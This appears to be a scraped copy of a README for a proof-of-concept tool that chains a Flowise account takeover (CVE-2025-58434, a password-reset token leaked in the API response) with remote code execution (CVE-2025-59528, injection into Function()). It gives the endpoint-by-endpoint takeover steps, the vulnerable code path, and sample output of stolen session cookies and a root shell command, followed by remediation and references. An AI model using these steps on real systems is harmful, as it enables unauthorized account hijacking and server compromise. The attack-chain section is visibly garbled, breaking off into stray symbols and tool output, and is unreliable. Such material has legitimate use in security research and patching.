Share
## https://sploitus.com/exploit?id=66FCB731-707B-51FB-8E17-862CAED2B9D1
# Flowise Dual CVE PoC โ€” CVE-2025-58434 + CVE-2025-59528

![CVE-1](https://img.shields.io/badge/CVE-2025--58434-red?style=flat-square)
![CVE-2](https://img.shields.io/badge/CVE-2025--59528-red?style=flat-square)
![CVSS](https://img.shields.io/badge/CVSS%20v3.1-9.8%20Critical-critical?style=flat-square)
![Python](https://img.shields.io/badge/Python-3.7%2B-blue?style=flat-square)
![License](https://img.shields.io/badge/License-MIT-green?style=flat-square)

> โš ๏ธ **For educational and authorized security research only.**  
> Running this tool against systems you do not own or lack written permission to test is **illegal**.

---

## Table of Contents

- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
  - [CVE-2025-58434 โ€” Account Takeover](#cve-2025-58434--account-takeover)
  - [CVE-2025-59528 โ€” Remote Code Execution](#cve-2025-59528--remote-code-execution)
- [Full Attack Chain](#full-attack-chain)
- [Affected Versions](#affected-versions)
- [Repository Structure](#repository-structure)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
  - [Help Screen](#help-screen)
  - [Chain Mode](#chain-mode-full-automation)
  - [Module โ€” ATO](#module--ato)
  - [Module โ€” Login](#module--login)
  - [Module โ€” RCE](#module--rce)
- [Flag Reference](#flag-reference)
- [Example Output](#example-output)
- [Remediation](#remediation)
- [Disclosure Timeline](#disclosure-timeline)
- [References](#references)
- [Disclaimer](#disclaimer)

---

## Overview

This repository combines two **critical** vulnerabilities in [Flowise](https://github.com/FlowiseAI/Flowise) into a single, modular PoC tool.

| | CVE-2025-58434 | CVE-2025-59528 |
|---|---|---|
| **Type** | Account Takeover | Remote Code Execution |
| **Auth Required** | None | Yes (any valid account) |
| **CVSS** | 9.8 Critical | Critical |
| **Affected** | Cloud + Self-hosted | Self-hosted |

The two vulnerabilities chain naturally: CVE-2025-58434 provides unauthenticated account takeover, which then satisfies the authentication requirement for CVE-2025-59528, achieving **unauthenticated RCE** in a single automated flow.

---

## Vulnerability Details

### CVE-2025-58434 โ€” Account Takeover

**Root Cause:** The `forgot-password` endpoint returns the password reset token (`tempToken`) directly in the HTTP response body instead of sending it only to the registered email address.

**Attack Steps:**
1. `POST /api/v1/account/forgot-password` with any registered email
2. Read `tempToken` from the JSON response โ€” no email access needed
3. `POST /api/v1/account/reset-password` with the leaked token to set a new password
4. Log in as the victim

**Leaked response structure:**
```json
{
  "user": {
    "id": "",
    "name": "Admin",
    "email": "admin@example.com",
    "credential": "",
    "tempToken": "LEAKED_TOKEN_HERE",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}
```

---

### CVE-2025-59528 โ€” Remote Code Execution

**Root Cause:** The `CustomMCP` node processes user-supplied `mcpServerConfig` by passing it directly to JavaScript's `Function()` constructor with no sanitization. Since Flowise runs in Node.js, the injected code has access to `process.mainModule`, `child_process`, `fs`, and all other Node.js built-ins.

**Vulnerable code path:**
```
POST /api/v1/node-load-method/customMCP
  -> convertToValidJSONString()
    -> Function('return ' + mcpServerConfig)()   ; refreshToken=; connect.sid=
```

---

## Full Attack Chain

```
Attacker                              Flowise API
   |                                      |
   |  [CVE-2025-58434]                    |
   |  POST /forgot-password {email}       |
   |------------------------------------->|
   ||
   ||
   |}   |
   |------------------------------------->|
   | admin@example.com / Flowise@Pwn3d2025!

  [Step 3] [CVE-2025-59528] Logging in to extract session cookies ...
  --------------------------------------------------------------------
  EXTRACTED SESSION COOKIES
  --------------------------------------------------------------------
  token           : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
  refreshToken    : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
  connect_sid     : s%3A4rey2nukFChp1ScRoJCbsBrRPf-DVBW5...
  --------------------------------------------------------------------

  [Step 4] [CVE-2025-59528] Executing RCE via CustomMCP ...
  [*] Command  : id
  [*] HTTP 200
  --------------------------------------------------------------------
  COMMAND OUTPUT
  --------------------------------------------------------------------
  $ id

    uid=0(root) gid=0(root) groups=0(root)

  --------------------------------------------------------------------
  [+] RCE confirmed!
  [+] Full chain complete.
```

---

## Remediation

### For CVE-2025-58434

- **Never return tokens in API responses.** Send the `tempToken` only via the registered email.
- Respond with a **generic success message** regardless of whether the email exists (prevents enumeration).
- Make tokens **single-use**, short-lived (โ‰ค15 min), and tied to request context.
- **Rate-limit** the `forgot-password` endpoint.

### For CVE-2025-59528

- **Never pass user input to `Function()`, `eval()`, or `vm.runInThisContext()`.**
- Parse `mcpServerConfig` as **data only** (e.g., `JSON.parse()`) โ€” never execute it.
- If dynamic evaluation is genuinely required, run it inside an isolated **sandbox** (e.g., `vm.runInNewContext()` with a restricted context, or a subprocess).
- Apply **strict input validation** and an allowlist of permitted configuration keys.

### General

- Apply all patches to **both cloud and self-hosted deployments**.
- Enable **logging and alerting** on password reset and node-load-method endpoints.
- Consider **MFA** for all admin accounts.

---

## Disclosure Timeline

| Date | Event |
|---|---|
| 2025-08-19 | CVE-2025-58434 discovered and reported |
| TBD | CVE-2025-59528 discovered and reported |
| TBD | Vendor acknowledgement |
| TBD | Patch released |
| TBD | Public disclosure |

---

## References

- [GHSA-wgpv-6j63-x5ph โ€” CVE-2025-58434 Advisory](https://github.com/advisories/GHSA-wgpv-6j63-x5ph)
- [GHSA-3gcm-f6qx-ff7p โ€” CVE-2025-59528 Advisory](https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p)
- [NVD โ€” CVE-2025-58434](https://nvd.nist.gov/vuln/detail/CVE-2025-58434)
- [Flowise GitHub](https://github.com/FlowiseAI/Flowise)
- [CWE-640: Weak Password Recovery Mechanism](https://cwe.mitre.org/data/definitions/640.html)
- [CWE-94: Improper Control of Code Generation](https://cwe.mitre.org/data/definitions/94.html)

---

## Disclaimer

This project is intended solely for **educational purposes** and **authorized penetration testing**.

- Do **NOT** run this against any system without **explicit written permission** from the system owner.
- The author(s) accept **no responsibility** for misuse, damage, or legal consequences.
- See [DISCLAIMER.md](./DISCLAIMER.md) for the full legal notice.